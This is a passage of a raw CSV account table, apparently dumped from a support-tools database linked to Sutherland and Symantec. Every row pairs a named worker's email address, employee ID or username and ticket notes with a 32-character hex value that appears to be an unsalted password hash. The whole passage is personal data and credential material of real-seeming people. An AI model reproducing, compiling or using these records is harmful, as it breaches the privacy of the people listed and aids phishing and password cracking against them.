herland Global Services, Inc.",585a31e9fd6475796d0860f4c6480fb7,Navales,<blank>,
jennylyn_navales,Jennylyn,NULL,NULL,NULL
eb0-4783-b387-ad78ef833131,<blank>,<blank>,RogerSingh_W@SUTH.COM,Sutherland,b39b
985181aca9bb7e7d7d5682f8c7a0,W,<blank>,RogerSingh_W,Roger Singh,NULL,NULL,NULL
fa5-481e-a210-30acb5664b26,<blank>,<blank>,v-6rowil@mssupport.microsoft.com,Suth
erland,6214385fa94b120245186b7b8adef9b9,Willard,<blank>,Romeo_Willard,Romeo,NULL
,NULL,NULL
e91d-4ea9-9f69-13f6a070522d,<blank>,<blank>,john_atilano@suth.com,CT - 28/06/201
2 - CRQ000000711802,9d79aa1fdae13d4478ffa1b58f2bb0bb,Atilano,<blank>,227010,John
,NULL,NULL,NULL
8ce-4a6f-b469-0e27f8e38a06,<blank>,<blank>,Ronalyn_Cura@SUTH.COM,Sutherland,baa8
a2e13b162a9c7c7c4b71f160d7c5,Cura,<blank>,Ronalyn_Cura,Ronalyn,NULL,NULL,NULL
17d5-4cab-8ca6-f9db97f26895,<blank>,<blank>,benedict_delossantos@suth.com,CT - 2
8/06/2012 - CRQ000000711914,c3fe57e55781ce147004ae5c4a81880d,delos Santos,<blank
>,227011,Benedict,NULL,NULL,NULL
bd34-411c-bc57-f628a440d393,<blank>,<blank>,michelle_palacpac@suth.com,CT - 28/0
6/2012 - CRQ000000711908,f6b9e0f4b6ec397f40767a090ddcfdc1,Palacpac,<blank>,22701
3,Michelle,NULL,NULL,NULL
4a4a-430a-8c27-0a3d02428793,PM - 5/20/2011 - CRQ000000261265,<blank>,tools_id@sy
mantec.suth.com,<blank>,937648c4426735aa1997582954bc9ab9,Pullela,<blank>,115795,
Swathi,NULL,NULL,NULL
a75c-42b0-a52d-73a7fd07c9d6,<blank>,<blank>,Aarcha_Jijo@symantec.com,<blank>,b77
4a42129bef5123a900ba222970ed7,Jijo,<blank>,111813,Aarcha,NULL,NULL,NULL
3cd-4fba-aea9-b2e57549cd35,<blank>,<blank>,Sanal_TC@SUTH.COM,Sutherland,cc15be78
6db5087392dfabfeaf49fe00,T C,<blank>,Sanal_TC,Sanal,NULL,NULL,NULL
57b-4fc3-8d58-f65005b88a1c,<blank>,<blank>,Sandhya_S2@SUTH.COM,Sutherland,775f14
80396d7cba0ed40517f1f89927,S,<blank>,Sandhya_S2,Sandhya,NULL,NULL,NULL
75a-4d48-9b2a-96c5a9b3a986,<blank>,<blank>,Sandhyamol_S@SUTH.COM,Sutherland,1f15
3ba88f5d864c7c99f0acc7aa998e,S,<blank>,Sandhyamol_S,Sandhyamol,NULL,NULL,NULL
7cf-4f83-9011-02658a6e3de0,<blank>,89229,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",58dfc0943c1b78780a5ddcb9d9bf1709,Dhali,<blank>,debabratha
_dhali,Debabratha,NULL,NULL,NULL
8c43-4aa6-953c-de0d3ed82b43,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,bf2dab1949401614ee63051477270a3f,U V,<blank>,074159,Giridharan,NULL,N
ULL,NULL
2d2-493c-82a7-a4e5881e2815,<blank>,<blank>,SameerAsif_B@SUTH.COM,Sutherland,93b5
eedbe797c71903816d5894f017a3,B,<blank>,SameerAsif_B,Sameer Asif,NULL,NULL,NULL
aa3-40d2-bbc2-14faadefe760,<blank>,<blank>,SamuelNirvinKumar_S@SUTH.COM,Sutherla
nd,f859c5820cd0573fcce5a9514de4db47,S,<blank>,SamuelNirvinKumar_S,Samuel Nirvin
Kumar,NULL,NULL,NULL
5c9-4a5b-bbc8-b943bd1e7b66,<blank>,<blank>,Sangeethaa_M@SUTH.COM,Sutherland,761d
d61d5392ec16385eacfb209ac698,M,<blank>,Sangeethaa_M,Sangeethaa,NULL,NULL,NULL
22b-452d-888b-ce728140a7c4,<blank>,<blank>,Sankar_RS@SUTH.COM,Sutherland,9731fe1
5e1c66ab413cff571258e1742,R S,<blank>,Sankar_RS,Sankar,NULL,NULL,NULL
eff3-477d-81ba-b322d47a1021,SRB 08.06.2010,INC190024,tools_id@symantec.suth.com,
Sutherland,bb7de541c2312c66f84840be384e822f,P,<blank>,098786,Abja,NULL,NULL,NULL
93ea-453d-ac43-cd036b674b4b,SSS 23/12/09,INC76392,symantec_2nd_maa@tp-tec.nl,TPN
,69217ef54adc1f6eadc18c585e0957ff,Sandberg,<blank>,062805,Linus,NULL,NULL,NULL
84b-43c8-9fc5-9ff8462ec02e,<blank>,<blank>,SarahPriyaDarsini_D@SUTH.COM,Sutherla
nd,ef1607921388ec106cffdab941388faa,D,<blank>,SarahPriyaDarsini_D,Sarah Priya Da
rsini,NULL,NULL,NULL
3f3-4d10-8acf-4bd2a006f98a,bpr-29-06-10,INC204643,Suchit_Tripathy@symantec.com,S
ymantec,2490343ce946248f2a6891fcc4b0b9e7,Vaid,<blank>,092616,Shalaab,NULL,NULL,N
ULL
3bf-4a96-a3f5-9756f93f883a,<blank>,<blank>,Sarama_Alfred@SUTH.COM,Sutherland,371
aefbbe5f954224a0ab84800673169,Alfred,<blank>,Sarama_Alfred,Sarama,NULL,NULL,NULL
771-45e1-b0dc-8d67f4b0184a,<blank>,<blank>,Sarvesh_Agarwal@SUTH.COM,Sutherland,8
3f696bd5a60d5a0fc6c02e1ca90c535,Agarwal,<blank>,Sarvesh_Agarwal,Sarvesh,NULL,NUL
L,NULL
084-41fa-a6d8-91474f2c448d,<blank>,<blank>,Sashi_MR@SUTH.COM,Sutherland,ebf2ac97
d0785cef8c63b66a5f68747a,Manohar,<blank>,Sashi_MR,Sashi,NULL,NULL,NULL
03a8-413b-8ce9-94133589efcb,CRQ000000718087--vmd-03/07/2012,<blank>,sivaraman_b@
suth.com,sutherland,74eb8a42d71b444084060126acbcd1e3,B,<blank>,227402,Sivaraman,
NULL,NULL,NULL
de8a-4c42-82f1-88de802cc0da,CRQ000000718090--vmd--03/07/2012,<blank>,priya_krish
namurthy1@suth.com,sutherland,d8574dec1a32ee923b574087a26e37b6,Krishnamurthy,<bl
ank>,227403,Priya,NULL,NULL,NULL
401-4f48-8b15-21fa0e71f515,<blank>,<blank>,Sathish_Raghavan@SUTH.COM,Sutherland,
fa42c44f21d9b326da3a1de0065b082c,Raghavan,<blank>,Sathish_Raghavan,Sathish,NULL,
NULL,NULL
66d5-431f-8cef-5fa4d3e67888,<blank>,<blank>,bgranier@symantec.com,Symantec,e9c14
85951b36db2ca2ea9210f021adb,Granier,<blank>,brad_granier,Brad,NULL,NULL,NULL
b627-41d6-8975-37450e65a1df,CRQ000000513223--vmd--19/01/2012,000-00,tools_id@sym
antec.suth.com,SUTHERLAND,7740976099c0b1f1033419d43430f6cf,Castillo,<blank>,1236
71,Mary,NULL,NULL,NULL
d54f-4ff5-8110-5a8331060d3a,CRQ000000718093--vmd--03/07/2012,<blank>,laxmi_naray
an@suth.com,sutherland,258039f3ec979d1069ee6105cf285ad9,Narayan,<blank>,227404,L
axmi,NULL,NULL,NULL
b33-4460-ac36-5627eca167fe,<blank>,<blank>,Shaikh_Rehman@SUTH.COM,Sutherland,1bb
08458be077316f9310983ea630adf,Rehman,<blank>,Shaikh_Rehman,Shaikh,NULL,NULL,NULL
bef-457f-b983-fd022a0bdbdf,<blank>,EMPROV/2635069,Tools_id@symantec.suth.com,Sou
therland,a660de855881e140abfe30ff53dab223,RavikanthYeluri,<blank>,091696,Achyuta
,NULL,NULL,NULL
c8a3-4d0f-a084-519d8c91bcea,SRB 19.07.2010,INC213497,tools_id@symantec.suth.com,
Sutherland,dc42ce41cfd1529460f9c63a80464aa5,Changkakoty,<blank>,074842,Riti,NULL
,NULL,NULL
e3a8-4d0e-86b2-f5dc01cf679b,nam-08-27-2010,INC000000251664,tools_id@symantec.sut
h.com,sutherland,5248313a5731dd5f0a9c8f69711dae80,N.G,<blank>,105059,Navin.,NULL
,NULL,NULL
18da-49a3-bd3e-57f37005a7ff,<blank>,<blank>,edyson_patacsil@suth.com,CT - 28/06/
2012 - CRQ000000711570,19fa85843bc6af6d662057d44f3bd86b,Patacsil,<blank>,226990,
Edyson,NULL,NULL,NULL
b735-4797-93d3-f4d5fc74fa3c,CRQ000000486406 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,4854cfc3fb99f575290844c818306397,Adrales,<blank>,123
651,YvesLaurene,NULL,NULL,NULL
2ef-4fe8-9fb1-c9023fdb5db7,<blank>,<blank>,SeguRizwan_B@SUTH.COM,Sutherland,f4bc
7f6bf43ec954c1dae3655f8a0f75,B,<blank>,SeguRizwan_B,Segu Rizwan,NULL,NULL,NULL
7549-4cc5-b0f7-379d2d93e95f,CRQ000000265000--VMD-25/05/11,<blank>,N_Rethas@syman
tec.com,SYMANTEC,3061984519df49cdf87b354d9e71f3a7,Rethas,<blank>,114489,N,NULL,N
ULL,NULL
f14-4891-b1e6-171cc38feeed,<blank>,<blank>,Shanmuga_VeluSamy@SUTH.COM,Sutherland
,71f925ac0512e30e7b428e0ae9271eed,Velu Samy,<blank>,Shanmuga_VeluSamy,Shanmuga,N
ULL,NULL,NULL
1ea-49a5-b76f-47550c6eb4df,<blank>,<blank>,Sharath_V@SUTH.COM,Sutherland,fa56407
924b6f3c040420fde331c288a,V,<blank>,Sharath_V,Sharath,NULL,NULL,NULL
7924-4051-8030-90fc016f1587,CRQ000000513217--vmd--19/01/2012,000-0000,tools_id@s
ymantec.suth.com,SUTHERLAND,06b8bb479a44c2883c44f77d0ec272fd,Cabido,<blank>,1236
69,Manuel,NULL,NULL,NULL
c307-405b-9517-aa1150153719,CRQ000000513250--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,4e08909457e91a6906f06c766d7d41ff,Villonez,<blank>,123
679,Rio,NULL,NULL,NULL
8789-4e67-afe7-b1093eb54a63,CRQ000000513254--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,bd951a1a03e07c7a06671f37712b53c6,Mussa,<blank>,123680
,Bilal,NULL,NULL,NULL
90c-42a6-a6d4-70e2d5971e1b,<blank>,<blank>,ShekinahAnne_Garcia@Suth.com,Sutherla
nd,7eb89919c0c6942f37c7cc431c3c0934,AnneGarcia,<blank>,ShekinahAnne_Garcia,Sheki
nah,NULL,NULL,NULL
019-4df2-9631-b370dc5e2398,<blank>,<blank>,Sheldon_Salace@SUTH.COM,Sutherland,dc
05f4fc1996c0fdf6af0df1d3bc17a8,Salace,<blank>,Sheldon_Salace,Sheldon,NULL,NULL,N
ULL
b4a6-4820-a496-a532aad4f9bc,<blank>,<blank>,france_alistar@suth.com,CT - 28/06/2
012 - CRQ000000711573,ed8f71c326aab6b56b7bf605afa0c2a5,Alistar,<blank>,226991,Fr
ance,NULL,NULL,NULL
84e-4f73-96ab-d974e0386b20,<blank>,<blank>,Shibinamol_K@SUTH.COM,Sutherland,44f1
d9fc6159f2f3be1be854da03309a,K,<blank>,Shibinamol_K,Shibinamol,NULL,NULL,NULL
d33-41f1-ab87-9ee34d1d3e88,<blank>,<blank>,Shibojyoti_Banerjee@SUTH.COM,Sutherla
nd,36bcd40e8e3612180255ed5b6cd847e8,Banerjee,<blank>,Shibojyoti_Banerjee,Shibojy
oti,NULL,NULL,NULL
07f-4846-8479-550e768f07a5,<blank>,<blank>,Shiju_S@SUTH.COM,Sutherland,95f27d05a
dfaee136210733ece45ecc9,S,<blank>,Shiju_S,Shiju,NULL,NULL,NULL
da6-46ca-9fd6-51f860016c4c,<blank>,<blank>,ShiyaamaSundar_L@SUTH.COM,Sutherland,
83fb624f890621d73c6b72dec5b88f17,L,<blank>,ShiyaamaSundar_L,Shiyaama Sundar,NULL
,NULL,NULL
72b2-4119-9c5a-169e3faf7e4a,CRQ000000515622 SP 20 Jan 2012,000-0000,sreenivaspas
upathi1@symantec.suth.com,Sutherland,2094de7bbfaefa19940cd7a7d24bfa51,Kottala,<b
lank>,124160,Sreenivas Pasupathi,NULL,NULL,NULL
4c70-404e-84b8-f763924aa717,sms 01.10,INC000000225859,tools_id@symantec.suth.com
,<blank>,e917155b1df5688bcbef1cbdffa7fdf5,Kandaswamy,<blank>,088757,Renuka,NULL,
NULL,NULL
7cc-4587-9af8-d5db6d6129db,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,3122ab662b23cb60e466b6c0e57c4b2d,Chavan,<blank>,Shrikant_Chavan,Shrikant,NULL,N
ULL,NULL
45a-4f5a-a98b-956cf7890a17,<blank>,<blank>,Shrikant_Kapoor@suth.com,Sutherland,5
7722e14c75d5ccf28192ad75f7ac09b,Kapoor,<blank>,Shrikant_Kapoor,Shrikant,NULL,NUL
L,NULL
6c4-4123-95d2-4167ca6285a2,<blank>,<blank>,Siddharth_Edwankar@SUTH.COM,Sutherlan
d,6742f4418f81a6b41e0affc3096fc3af,Edwankar,<blank>,Siddharth_Edwankar,Siddharth
,NULL,NULL,NULL
ff2-40c3-993b-342d3c88fc19,<blank>,<blank>,Sidhartha_AS@SUTH.COM,Sutherland,72bc
8baef0750cac957ed9778b7e454a,A S,<blank>,Sidhartha_AS,Sidhartha,NULL,NULL,NULL
6866-4502-b446-6aa285cc61c6,CRQ000000515616 SP JAN 20 2012,000-0000,sureshkumar_
lakhin1@symantec.suth.com,Sutherland,ca5d17924a9440bb4e5bfc234a855f34,Lakhinana,
<blank>,124159,Suresh Kumar,NULL,NULL,NULL
5c99-4234-96ba-cc69785b9fbe,<blank>,<blank>,lester_marilag@suth.com,CT - 28/06/2
012 - CRQ000000711681,ea20f0e646e9f33532b15ba963d43057,Marilag,<blank>,226992,Le
ster,NULL,NULL,NULL
2b2-4e41-87a4-dbecb0284a3b,<blank>,<blank>,SivaPrasad_P@SUTH.COM,Sutherland,cd63
01ba08e8b40a1a07992c228a14d3,P,<blank>,SivaPrasad_P,Siva Prasad,NULL,NULL,NULL
b77-4f38-8cd2-d4edb3ec1f72,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,4633c1c45da66f68c1833ea226137c17,R Doshi,<blank>,Sneha_RDoshi,Sneha,NULL,NULL,N
ULL
000-4c4c-aeee-3c3d18e28862,<blank>,<blank>,v-6shano@mssupport.microsoft.com,Suth
erland,e11aa9ce44ccf5d89965c8d3f3d462c4,Gorman,<blank>,Shannon_Gorman,Shannon S
O,NULL,NULL,NULL
fe6c-4e9f-8ebc-783622246864,<blank>,<blank>,Cherrie_Abucay@SPI.COM,PM - 6/14/201
2 - CRQ000000694716,719849e663d0dcd257a56eee726cb531,Abucay,<blank>,226755,Cherr
ie,NULL,NULL,NULL
fb94-4020-8c5a-4ecfb57138fe,102950,<blank>,kevin_kennedy1@symantec.com,Symantec,
708a030bd08361e927f3bea26b1005a7,Kennedy,<blank>,kevin_kennedy1,Kevin,NULL,NULL,
NULL
1028-460d-9bde-81e11d098942,PM - 5/20/2011 - CRQ000000261274,<blank>,tools_id@sy
mantec.suth.com,<blank>,74215ad28c8b1b61c2c3bac14d32631d,Reddy,<blank>,115832,Bh
anu Kanth,NULL,NULL,NULL
8e46-4c54-97dd-f27df84c15a6,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,99cd4aea4f1556be38bcb6b2695ad08e,Kishore Addanki S,<blank>,074610,Pha
ni,NULL,NULL,NULL
6d9-42c1-8b7b-e91d4422c798,<blank>,<blank>,SheikImtiazAnsari_M@SUTH.COM,Sutherla
nd,ad5c16ef8e809f578923cd133e59cb4b,M,<blank>,SheikImtiazAnsari_M,Sheik Imtiaz A
nsari,NULL,NULL,NULL
ad4e-4d7d-b946-18c7769e4dd2,"REQ000001395706 CLNP June 15,2012",999-999-9999,ler
oy.dassen@teleperformance.nl,Teleperformance,fe0a34b23df22bfab84c4a44ff1fb64f,Da
ssen,<blank>,225536,Leroy,NULL,NULL,NULL
56c0-4cee-9fa7-a2ad4cb33fed,CRQ000000712787--vmd--28/06/2012,<blank>,vishal_chhe
da@suth.com,sutherland,90822a8c8713284ca6b53b667e7621e6,Chheda,<blank>,227064,Vi
shal,NULL,NULL,NULL
6ee6-4afb-a12f-83c8088dfa36,CRQ000000721267--vmd--05/07/2012,<blank>,imran_konda
kar@suth.com,sutherland,480ee9457586d7dc5d6d66ae53552be3,Kondakar,<blank>,227362
,Imran,NULL,NULL,NULL
673-47eb-b3b8-d8f9a55fc92b,<blank>,<blank>,Shoiab_Nivrekar@SUTH.COM,Sutherland,f
d1aaaa32641a9b57c6a588e8dbf8be1,Nivrekar,<blank>,Shoiab_Nivrekar,Shoiab,NULL,NUL
L,NULL
410c-4bc1-ba96-0f54c8516862,sp-10/1/2011,<blank>,tools_id@symantec.suth.com,<bla
nk>,5bd5f11fa83e52a7bf4d6396183bf615,A,<blank>,111954,Menaka,NULL,NULL,NULL
052-44de-a048-420aaea21f92,<blank>,2635104,Tools_id@symantec.suth.com,Sutherland
,e9159960b23f54b27be6720821a43c1b,Joseph,<blank>,Siewert_Joseph,Siewert,NULL,NUL
L,NULL
b3da-4628-90a3-9866ec098b24,CRQ000000515619 SP 20 JAN 2012,000-0000,santoshkumar
_yalaman@symantec.suth.com,Sutherland,281e7844c3daa32ad26bbe86959535ee,Yalamanch
ili,<blank>,124161,Santosh Kumar,NULL,NULL,NULL
59c5-47d7-8767-dcd5e7d0f3ac,sms 01.10,INC213497,tools_id@symantec.suth.com,<blan
k>,0f570dfe7fe43d28173d98a85e8dbd92,Agarwal,<blank>,075440,Amit,NULL,NULL,NULL
11e3-4363-a3f4-86c8c1f9b2ce,<blank>,<blank>,tools_id@symantec.suth.com,RM-23 Jan
2012-CRQ000000518143,733d63b4311e44deb181a2a19d46f5f6,Ventura,<blank>,124177,Ma
riaJamaima,NULL,NULL,NULL
6c2-48af-a900-96064fb088a6,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,0e428a5f0711b2cce269d34f71ca4f70,Abdul Rajack,<blank>,Sirajudeen_A,Sirajudeen,N
ULL,NULL,NULL
9a9-41fe-9619-11232d312df3,<blank>,<blank>,Sithara_P@SUTH.COM,Sutherland,3653f2b
5a8c4b3067167df20b9b08ef4,P,<blank>,Sithara_P,Sithara,NULL,NULL,NULL
d9ed-4bcd-945d-b9663f0309e7,hvk 11Jan2010,INC153432,Michael_Brinkerhoff1@symante
c.com,Symantec,2f0db8d9507f6e5e20314de56d54b436,Brinkerhoff,<blank>,091326,Micha
el,NULL,NULL,NULL
83b-43d4-a909-a2373c9499c2,<blank>,<blank>,SivaPrasath_M@SUTH.COM,Sutherland,2ee
610a88c12e8981bef5f313c840f68,M,<blank>,SivaPrasath_M,Siva Prasath,NULL,NULL,NUL
L
380b-45df-a07a-0125676e955b,"CRQ000000830075 CLNP Oct 08,2012",000-0000,miraflor
_abad@symantec.com,Symantec,20896b0be489c6749a70fc1df683a655,Abad,<blank>,230613
,Miraflor,NULL,NULL,NULL
d22-4422-a4cf-06fb2b9aa2ea,<blank>,<blank>,slath@suth.com,Sutherland,7c289aca7fa
0d51b9259e8f3e3d8a158,Srinivasan,<blank>,slath,Latha,NULL,NULL,NULL
370-4381-8f2e-e1a3a33c530f,<blank>,<blank>,Smisha_PK@SUTH.COM,Sutherland,891e5dd
00ba3d2edf8a63aefbaad8563,P K,<blank>,Smisha_PK,Smisha,NULL,NULL,NULL
0ab-466d-9e9b-9e53b9dd79a4,<blank>,<blank>,Smitha_TV@SUTH.COM,Sutherland,e42477b
6b47e5551bd6af2be524a7f18,T V,<blank>,Smitha_TV,Smitha,NULL,NULL,NULL
c42-4143-8f6e-aaf9f2940c1e,<blank>,<blank>,Soumya_GS@SUTH.COM,Sutherland,6c361b8
6f545a9a06346f9293a98ea3b,G S,<blank>,Soumya_GS,Soumya,NULL,NULL,NULL
d2f-4730-a0dd-00e14f5c275b,<blank>,<blank>,Sreelakshmi_CB@SUTH.COM,Sutherland,cc
c38572cc86f10d6d567bb87673ce23,C B,<blank>,Sreelakshmi_CB,Sreelakshmi,NULL,NULL,
NULL
0ef9-4c66-b22f-4b2fc4ece69f,CRQ000000486395 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,47795a59615873cf854c6fa1f9194d6d,Lomahan,<blank>,123
649,SheenaMae,NULL,NULL,NULL
06c-4671-9f94-4e155da07aa0,<blank>,<blank>,Sree_BS@SUTH.COM,Sutherland,f22524658
21482c7b4b9d87e2235a782,B S,<blank>,Sree_BS,Sree,NULL,NULL,NULL
425-40ab-8011-2d95a91d0494,<blank>,<blank>,SriDevi_B@SUTH.COM,Sutherland,c18fc40
5f49e7094a2425cec4eb05953,B,<blank>,SriDevi_B,Sridevi,NULL,NULL,NULL
5b02-4f37-9d41-fb2c94931546,CRQ000000489486 CLNP 05 Jan 2012,000-0000,tools_id@s
ymantec.suth.com,Sutherland,1c19ac6ccb62f90c7f73232774b33f30,Daniel D,<blank>,09
3590,John,NULL,NULL,NULL
cb1-478c-b81a-79334c3d9573,<blank>,<blank>,SrideviVijayalakshmi_S@SUTH.COM,Suthe
rland,888dafa44d86f83ca2cd4d82dd702c43,S,<blank>,SrideviVijayalakshmi_S,Sridevi
Vijayalakshmi,NULL,NULL,NULL
fa7-4a97-94a8-ac4a4339502f,<blank>,<blank>,SriKrishnaChaitanya_K@SUTH.COM,Suther
land,3ab845f53df88db86781a23ce3046f96,K,<blank>,SriKrishnaChaitanya_K,Sri Krishn
a Chaitanya,NULL,NULL,NULL
9c70-45a1-a0fe-2d4a110d1f1c,<blank>,<blank>,\ttools_id@symantec.suth.com,11th Ja
n 2012 - PR - CRQ000000496551,2c8ea1d952f5c5a084c6e8b75dba7af8,Naguita,<blank>,1
23861,RubyJane,NULL,NULL,NULL
9f50-491d-9358-34a4ce58c9a0,"CRQ000000830153 CLNP Oct 08,2012",000-0000,rodel_al
agao@symantec.com,Symantec,9b8b6a4f4406f7f2943d83ccd1b9cc40,Alagao,<blank>,23060
7,Rodel,NULL,NULL,NULL
bcaa-4636-8dde-b53b4934b7ad,CRQ000000718035--vmd--03/07/2012,<blank>,mohammed_za
kir1@suth.com,sutherland,b5ad165f490aee55a33d41f1da5a2409,Zakir,<blank>,227391,M
ohammed,NULL,NULL,NULL
12a-438e-bdb9-dbda7c741d92,<blank>,<blank>,Sruthy_Rajan@SUTH.COM,Sutherland,d42b
f58402e3c6fae5d7f99687969ce6,Rajan,<blank>,Sruthy_Rajan,Sruthy,NULL,NULL,NULL
109-4f17-b006-43174d9ab694,<blank>,<blank>,Suchithra_S@SUTH.COM,Sutherland,11616
8e5abd305647ba696502477760e,S,<blank>,Suchithra_S,Suchithra,NULL,NULL,NULL
8749-4946-b4ae-722d750c5747,CRQ000000513232--VMD--19/01/2012,000-000,tools_id@sy
mantec.suth.com,SUTHERLAND,ff142821658d593e18bec4567c0bd745,Daya,<blank>,123674,
Karen,NULL,NULL,NULL
eab-4a52-a9f8-bce30fec6bd5,<blank>,<blank>,Sudharsan_S@SUTH.COM,Sutherland,0d00a
7a2eb09406b76bebceef55bedc4,S,<blank>,Sudharsan_S,Sudharsan,NULL,NULL,NULL
cebb-45a8-80c0-5240dbf5983a,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
513260 - PR - 19th Jan 2012,c7d5b1fc82c4455fe18defe4f5b48d11,Yap,<blank>,123683,
\xa0Leony,NULL,NULL,NULL
b679-4cd3-8ef9-10bf997b99a0,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,f06d95683364284f8a8cca373e866f88,V,<blank>,074383,Rajasekar,NULL,NULL
,NULL
1a45-482f-b7e1-075c1732d67c,nam 07/07/2010,INC207500,tools_id@symantec.suth.com,
Sutherland,6eda9188d4be19c1c8734dc59839337c,Pail Uriat,<blank>,075136,Garlie,NU
LL,NULL,NULL
311-45c1-9db0-8619a6005873,<blank>,<blank>,Sunu_SP@SUTH.COM,Sutherland,7c67e65f4
5aedd076c565377729ca418,S P,<blank>,Sunu_SP,Sunu,NULL,NULL,NULL
376-4680-b775-ee7bfa63828e,<blank>,<blank>,SurajKumar_L@SUTH.COM,Sutherland,5900
57ee704242217f4e47127208eb16,L,<blank>,SurajKumar_L,Suraj Kumar,NULL,NULL,NULL
236-4f53-83a7-f514b5dd42b4,<blank>,<blank>,Tools_id@symantec.suth.com,Sutherland
,941c009823a4a4b409efab4d541a836b,Logaiyan,<blank>,Suresh_Babu,Suresh,NULL,NULL,
NULL
104d-4449-a190-962d8edb6435,CRQ000000718047--vmd--03/07/2012,<blank>,vasumati_go
palan@suth.com,sutherland,ae3ebb7ea13b7c4a457f3fe3305b0507,Gopalan,<blank>,22739
3,Vasumati,NULL,NULL,NULL
d2b7-47f9-95a8-126d8b1ce127,"CRQ000000830156 CLNP Oct 08,2012",000-0000,marvin_r
oxas@symantec.com,Symantec,52462c058b62b7aacce0bf71ae51c551,Roxas,<blank>,230609
,Marvin ,NULL,NULL,NULL
476-4d7f-a2aa-5ec4f729e0cb,<blank>,<blank>,Suruthi_VM@SUTH.COM,Sutherland,3180b0
de3d2f1e215d86e48b42f3bfe2,V M,<blank>,Suruthi_VM,Suruthi,NULL,NULL,NULL
805-4948-a63f-2c60ff79fda6,<blank>,<blank>,Susan_Fernandez@SUTH.COM,Sutherland,b
e12bc144c676aeccf4b34a2205f86be,Fernandez,<blank>,Susan_Fernandez,Susan,NULL,NUL
L,NULL
f15-4f8d-a930-2a204611124a,<blank>,<blank>,Swaranjeet_Chhabra@SUTH.COM,Sutherlan
d,8d9e706baecccf5852efe0038e087b58,Chhabra,<blank>,Swaranjeet_Chhabra,Swaranjeet
,NULL,NULL,NULL
ca0-4878-8d1d-23690b1a470e,<blank>,<blank>,SyedSartaze_B@SUTH.COM,Sutherland,f5c
4e57de25fd56607f1616c457bd94e,B,<blank>,SyedSartaze_B,Syed Sartaze,NULL,NULL,NUL
L
cd6-4471-8968-08be658c842c,<blank>,<blank>,Tools_id@symantec.suth.com,Symantec,8
fa3e16097d9109e23c026ddd1fb179b,Brown,<blank>,Timothy_PBrown,Timothy,NULL,NULL,N
ULL
761-4c23-8f6b-03ef8ce23aa3,<blank>,<blank>,TedJohndel_Bayanan@SUTH.COM,Sutherlan
d,16c4145d5e04f10410ba00bf37d275d1,JohndelBayanan,<blank>,TedJohndel_Bayanan,Ted
,NULL,NULL,NULL
628-4d03-ba33-7a56e827b256,<blank>,2630245,v-6terrl@mssupport.microsoft.com,Suth
erland,f0ad4b762b83421ffa55909147414c3d,Laboucane,<blank>,Terianne_Laboucane,Ter
rianne,NULL,NULL,NULL
ab48-4f47-a411-3b8a78203cbd,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,666ab05da51ffd21dc888e07b9ca9369,Singh,<blank>,117094,Dilp
reet,NULL,NULL,NULL
e2ef-4f17-9c3e-4f9b853577b7,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,4b9f786b38d63e83afa4a8ed8c61d08f,Raghavan,<blank>,1
16095,Sanjay Kumar Sarala ,NULL,NULL,NULL
33b-4169-9255-894b69bd9b79,<blank>,<blank>,Soumya_VS@SUTH.COM,Sutherland,4bc4ee3
0bb0b4f73c0c48682fa0f8367,V S,<blank>,Soumya_VS,Soumya,NULL,NULL,NULL
dc5-4764-9c8e-bcb555d9e27c,<blank>,<blank>,Sreedhar_BAV@SUTH.COM,Sutherland,741e
ad8b6c8ae8f198ddc44161150b8e,B A V,<blank>,Sreedhar_BAV,Sreedhar,NULL,NULL,NULL
78c-4550-9bb1-9086c6dba6fd,<blank>,88711,symaccounts@e4e.com,e4e,9321a5994d45104
362b7e0d237748e0b,Ramanathan,<blank>,pradeep_ramanathan,Pradeep,NULL,NULL,NULL
8a8a-4447-8b60-b54423822192,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
346914 - PR - 29th Sept 2011,1fe8e2aaebe883aacf680d0f5bfb2aee,Raj,<blank>,116085
,Prasad ,NULL,NULL,NULL
933-4527-821a-1c78e7516a70,<blank>,<blank>,Sudeep_Mathew@SUTH.COM,Sutherland,555
1e60c1b6745e6b6f2c7fdb03cf551,Mathew,<blank>,Sudeep_Mathew,Sudeep,NULL,NULL,NULL
bb7-4e00-bd13-da79058f36d7,<blank>,<blank>,Sufiyan_Kakingarae@SUTH.COM,Sutherlan
d,d7f6015cc911f3b4b270a548a83713b7,Kakingarae,<blank>,Sufiyan_Kakingarae,Sufiyan
,NULL,NULL,NULL
512a-462b-9439-3a05409aee52,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,d1222531e319198f6bf9f8b18561bc48,Nifinsha ,<blank>,mohammed_nifinsha_cc,M
ohammed ,NULL,NULL,NULL
439-477f-ba81-0446121fb440,<blank>,<blank>,Sujith_M@SUTH.COM,Sutherland,cb2a4703
5b5eafb003a446e5d6909c2f,M,<blank>,Sujith_M,Sujith,NULL,NULL,NULL
263d-49d2-8937-14436226d963,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,e06f23e0e10beb859fa3baf770adf46b,Ayyasamy,<blank>,114197,M
anikandan,NULL,NULL,NULL
b40e-4ac3-91fb-94061830a513,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,e669a40768ef8ce90774dcf53cb42768,Angeles,<blank>,michael_angeles_cc,Micha
el,NULL,NULL,NULL
f48-443e-ba27-f5e06bd1276f,<blank>,<blank>,Suman_Andrews@SUTH.COM,Sutherland,7ac
a520e22c6677066c3e832091fcc8d,Andrews,<blank>,Suman_Andrews,Suman,NULL,NULL,NULL
dbd-4279-bfa0-3c2c03d323ba,<blank>,<blank>,Sumathi_R1@SUTH.COM,Sutherland,a91b49
